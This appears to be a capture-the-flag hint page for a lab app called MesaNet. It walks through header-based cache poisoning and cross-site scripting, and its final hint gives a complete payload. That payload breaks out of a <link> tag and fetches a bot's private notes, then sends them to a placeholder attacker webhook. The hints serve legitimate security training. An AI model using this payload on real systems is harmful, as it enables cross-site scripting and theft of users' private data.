MesaNet is a Black Mesa Transit rail broadcast panel running on Bugforge's lab infrastructure. The application caches API responses and reflects a custom header value directly into HTML, creating a chained attack path: poison the cache with a script injected via a custom header, then trick a bot into viewing the poisoned page — causing it to exfiltrate its private notes (and the flag) to an attacker-controlled webhook.
Objective: Build a complete payload that breaks out of the <link> tag context and executes JavaScript, which will POST-fetch the bot's private notes and exfiltrate them to your webhook.
Context: The <link> tag in the HTML looks like: <link rel='stylesheet' href='/public/css/rail-SKIN.css'>. You need to close this tag, then inject a script that: (1) sends a POST request to /gateway with the body targeting /api/notes/lists, and (2) forwards the response to your webhook. The JSON body must use \x22\x22 instead of "" to avoid breaking the JSON parser via backslash escaping in the injected context.
Only reveal the ones you need. Claude tracks how many you used to calibrate the feedback.
Think about what string sequence closes a <link> tag inside an href attribute, and what you can inject immediately after to run JavaScript.
You need to escape the href value and close the <link> tag first (e.g., with /css/default.css">), then add a <script> block or inline event handler that performs a fetch() to the /gateway endpoint and pipes the result to a webhook.
Use X-Rail-Skin: /css/default.css"><script>fetch('/gateway',{method:'POST',headers:{'Content-Type':'application/json'},body:'{\x22endpoint\x22:\x22/api/notes/lists\x22}',mode:'no-cors'}).then(r=>r.text()).then(d=>fetch('https://YOUR_WEBHOOK/?d='+btoa(d)))</script> — replace \x22 with the hex escape for double-quotes to avoid JSON parser issues.
Enjoying Hintru? Buy me a coffee ☕ ☕